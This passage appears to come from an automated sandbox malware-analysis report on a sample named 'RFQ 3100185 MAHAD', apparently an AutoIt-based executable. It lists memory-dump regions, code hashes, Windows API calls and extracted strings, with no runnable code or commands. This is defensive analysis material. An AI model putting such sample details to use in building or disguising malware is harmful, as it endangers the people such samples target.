                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: b9c29be62f3be2df2e420e13f5edf9326be91a30ea57a2dade291fa99cd86709
                                                            • Instruction ID: 3553d5d937cb29ae91cd3544baa91a3dca520121443ff296526e701c84ce0199
                                                            • Opcode Fuzzy Hash: b9c29be62f3be2df2e420e13f5edf9326be91a30ea57a2dade291fa99cd86709
                                                            • Instruction Fuzzy Hash: A0A0113000030CAB8F002B82FC088883F2CFA802A0B008020F80C00220AB22A8208A82
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 841b21db8b146a199d20fa7a8713c789565ff82e61a37cf02aaeea591740670d
                                                            • Instruction ID: 28d46a5c54434190dd40dd8cc2a864469ad89f01b8b528d17ea4f62eb0ea80bc
                                                            • Opcode Fuzzy Hash: 841b21db8b146a199d20fa7a8713c789565ff82e61a37cf02aaeea591740670d
                                                            • Instruction Fuzzy Hash: 4A22AA70A0421ACFDB24DF58C484BEEB7B1FF18314F248169E95A9B351E739AD81CB91
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea4aabc84c66579bb477cf9cc4a8e21406b6f1c51587f34c66bef47bb5f0c8e2
                                                            • Instruction ID: dd350d9c1145360ae32b4a093e049d03a2d2f978801febb87203ee54356e7ea7
                                                            • Opcode Fuzzy Hash: ea4aabc84c66579bb477cf9cc4a8e21406b6f1c51587f34c66bef47bb5f0c8e2
                                                            • Instruction Fuzzy Hash: FE127C70A00219EFDF14DFA8D985AEEB7F5FF48300F108569E916E7250EB39A960CB50
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3728558374-0
                                                            • Opcode ID: 8e86fe606d985c2936c7bd71174a139e2d423009536541da146a74b1269f1c46
                                                            • Instruction ID: 1192c5fa87a08692726749b8c0d9e7559c0795c86937e24044ac44d8201f5260
                                                            • Opcode Fuzzy Hash: 8e86fe606d985c2936c7bd71174a139e2d423009536541da146a74b1269f1c46
                                                            • Instruction Fuzzy Hash: 4002C3B0A00119EFDF14DF68D985BAEBBB5FF48300F108069E806DB255EB39DA55CB91
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                            • Instruction ID: c348153359127be6a4b962a173c5595f90317e80c62c86ad797f85bc67bf185c
                                                            • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                            • Instruction Fuzzy Hash: 38C1E7322051970ADF2D463AC434A3EFBB15E927B171A176ED8B3CB5D1EF28C524D660
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                            • Instruction ID: db9bb7ee0858f8c6defb8c478e51f0a0db3e2d5ffc8207fb1eea1bcf93261ebd
                                                            • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                            • Instruction Fuzzy Hash: 9EC1053220519709DF2D463AC43463EBBB15EA2BB170A236ED4B3CF2D5EF28D524D660
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                            • Instruction ID: 6e11825577c28213d81f248c22e1071417b0a0b719be04a5086388b248647332
                                                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                            • Instruction Fuzzy Hash: F1C1B5322051970ADF2D463AC434A3EFBA25AA27B171A177ED4B3CB5D5FF28C524D620
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: 466141137a12780d743bb6e6bcb077f4160de8b0e8e7d25581c29e7015a4e397
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 61C1A43220509709DF2D463AC474E3EFBA25AA2BB131A177DD8B3CB5D5EF28C564D620
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 0080A2FE
                                                            • DeleteObject.GDI32(00000000), ref: 0080A310
                                                            • DestroyWindow.USER32 ref: 0080A31E
                                                            • GetDesktopWindow.USER32 ref: 0080A338
                                                            • GetWindowRect.USER32(00000000), ref: 0080A33F
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0080A480
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0080A490
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A4D8
                                                            • GetClientRect.USER32(00000000,?), ref: 0080A4E4
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0080A51E
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A540
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A553
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A55E
                                                            • GlobalLock.KERNEL32(00000000), ref: 0080A567
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A576
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0080A57F
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A586
                                                            • GlobalFree.KERNEL32(00000000), ref: 0080A591
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A5A3
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0083D9BC,00000000), ref: 0080A5B9
                                                            • GlobalFree.KERNEL32(00000000), ref: 0080A5C9
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0080A5EF
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0080A60E
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A630
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A81D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: 93f1248f008fc01908e89cc9063e3d0e10388e4366376fda30376876937cae5e
                                                            • Instruction ID: b57f1ec4b8131ed631acc541116a009135e2f8d4120018ef7017f954f96a555b
                                                            • Opcode Fuzzy Hash: 93f1248f008fc01908e89cc9063e3d0e10388e4366376fda30376876937cae5e
                                                            • Instruction Fuzzy Hash: 1F024875900208EFDB14DFA8DD89EAEBBB9FB48310F048558F915EB2A1D774AD41CB60
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 0081D2DB
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0081D30C
                                                            • GetSysColor.USER32(0000000F), ref: 0081D318
                                                            • SetBkColor.GDI32(?,000000FF), ref: 0081D332
                                                            • SelectObject.GDI32(?,00000000), ref: 0081D341
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0081D36C
                                                            • GetSysColor.USER32(00000010), ref: 0081D374
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0081D37B
                                                            • FrameRect.USER32(?,?,00000000), ref: 0081D38A
                                                            • DeleteObject.GDI32(00000000), ref: 0081D391
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0081D3DC
                                                            • FillRect.USER32(?,?,00000000), ref: 0081D40E
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0081D439
                                                              • Part of subcall function 0081D575: GetSysColor.USER32(00000012), ref: 0081D5AE
                                                              • Part of subcall function 0081D575: SetTextColor.GDI32(?,?), ref: 0081D5B2
                                                              • Part of subcall function 0081D575: GetSysColorBrush.USER32(0000000F), ref: 0081D5C8
                                                              • Part of subcall function 0081D575: GetSysColor.USER32(0000000F), ref: 0081D5D3
                                                              • Part of subcall function 0081D575: GetSysColor.USER32(00000011), ref: 0081D5F0
                                                              • Part of subcall function 0081D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0081D5FE
                                                              • Part of subcall function 0081D575: SelectObject.GDI32(?,00000000), ref: 0081D60F
                                                              • Part of subcall function 0081D575: SetBkColor.GDI32(?,00000000), ref: 0081D618
                                                              • Part of subcall function 0081D575: SelectObject.GDI32(?,?), ref: 0081D625
                                                              • Part of subcall function 0081D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0081D644
                                                              • Part of subcall function 0081D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0081D65B
                                                              • Part of subcall function 0081D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0081D670
                                                              • Part of subcall function 0081D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0081D698
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: df6a1e41d0910c54af3b2ffbb7af963c19162572055b7d13dfbb143f03390b4c
                                                            • Instruction ID: 8582253a2734b19a1d6ff8e59fe32ef365e7ef5af470b072b5b7f37b042d32e5
                                                            • Opcode Fuzzy Hash: df6a1e41d0910c54af3b2ffbb7af963c19162572055b7d13dfbb143f03390b4c
                                                            • Instruction Fuzzy Hash: 65916D72408305EFDB109F64EC48EABBBA9FF85325F100E19F966961A0D771D984CB52
                                                            APIs
                                                            • DestroyWindow.USER32 ref: 007CB98B
                                                            • DeleteObject.GDI32(00000000), ref: 007CB9CD
                                                            • DeleteObject.GDI32(00000000), ref: 007CB9D8
                                                            • DestroyIcon.USER32(00000000), ref: 007CB9E3
                                                            • DestroyWindow.USER32(00000000), ref: 007CB9EE
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0082D2AA
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0082D2E3
                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0082D711
                                                              • Part of subcall function 007CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007CB759,?,00000000,?,?,?,?,007CB72B,00000000,?), ref: 007CBA58
                                                            • SendMessageW.USER32 ref: 0082D758
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0082D76F
                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0082D785
                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0082D790
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                            • String ID: 0
                                                            • API String ID: 464785882-4108050209
                                                            • Opcode ID: 48bf52a1303d0efddfb87421068d621ba5ee765c4db7038e7469f496c4a83b68
                                                            • Instruction ID: 58c4de2897c6f241b29d737fd8e741b1785b12cda88aff5bd18b7dbffea08e6c
                                                            • Opcode Fuzzy Hash: 48bf52a1303d0efddfb87421068d621ba5ee765c4db7038e7469f496c4a83b68
                                                            • Instruction Fuzzy Hash: B2127770604321DFDB24DF28E889BA9BBE5FB55304F14456DF989CB262C735E882CB91
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 007FDBD6
                                                            • GetDriveTypeW.KERNEL32(?,0084DC54,?,\\.\,0084DC00), ref: 007FDCC3
                                                            • SetErrorMode.KERNEL32(00000000,0084DC54,?,\\.\,0084DC00), ref: 007FDE29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: c7737af67fef86cfd56deb4a657fdba5d09b408fb84ac493700a488cf874e355
                                                            • Instruction ID: 73d0b8cad3d6ac80a9dba883e86e45fa7c296d1c117a7096f75133154e51080a
                                                            • Opcode Fuzzy Hash: c7737af67fef86cfd56deb4a657fdba5d09b408fb84ac493700a488cf874e355
                                                            • Instruction Fuzzy Hash: DA51B33034830AEBC224EF14C8869B9B7A2FB94720B25491AF267D7395DB7CDD45D742
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: 687b9293c1437df0882122b950b6686830c068a1ba8bdb22edcd1af7cfe89de3
                                                            • Instruction ID: eb02776338f650374ac0b4c95269fffda5b908678d98db312d4d0cbd350ebfc5
                                                            • Opcode Fuzzy Hash: 687b9293c1437df0882122b950b6686830c068a1ba8bdb22edcd1af7cfe89de3
                                                            • Instruction Fuzzy Hash: 2081D874740219FBDB26AA64DC56FEF3779FF24310F048029F905EB282EB68D941D2A1
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0081C788
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0081C83E
                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0081C859
                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0081CB15
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: 0
                                                            • API String ID: 2326795674-4108050209
                                                            • Opcode ID: c0ab5f5a0418df5edad2f0b4a66882c1f95d0c44f4313fff483926e986767ec8
                                                            • Instruction ID: 6d97bded59f215a30844bb5a8fad446c78e017d12a1cf492487c62b84a950839
                                                            • Opcode Fuzzy Hash: c0ab5f5a0418df5edad2f0b4a66882c1f95d0c44f4313fff483926e986767ec8
                                                            • Instruction Fuzzy Hash: B2F1E5B1188305AFD7218F28C88ABEABBE8FF45754F04092DF599D62A1D774CC80CB91
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,0084DC00), ref: 00816449
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 3964851224-45149045
                                                            • Opcode ID: 641cf185c167a4dc2b9e08e80b4f4fe9d423593ffabf44ba05b820360c0bca6b
                                                            • Instruction ID: e708c8353150a4186d4ea1d7e6568fa15feb08c5c2b29b3c03fb4c93bee8e48c
                                                            • Opcode Fuzzy Hash: 641cf185c167a4dc2b9e08e80b4f4fe9d423593ffabf44ba05b820360c0bca6b
                                                            • Instruction Fuzzy Hash: 97C18030204249CBCB14EF10C555AEE77A9FF95348F04486CF996DB2D2EB24ED9ACB91
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0081D5AE
                                                            • SetTextColor.GDI32(?,?), ref: 0081D5B2
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0081D5C8
                                                            • GetSysColor.USER32(0000000F), ref: 0081D5D3
                                                            • CreateSolidBrush.GDI32(?), ref: 0081D5D8
                                                            • GetSysColor.USER32(00000011), ref: 0081D5F0
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0081D5FE
                                                            • SelectObject.GDI32(?,00000000), ref: 0081D60F
                                                            • SetBkColor.GDI32(?,00000000), ref: 0081D618
                                                            • SelectObject.GDI32(?,?), ref: 0081D625
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0081D644
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0081D65B
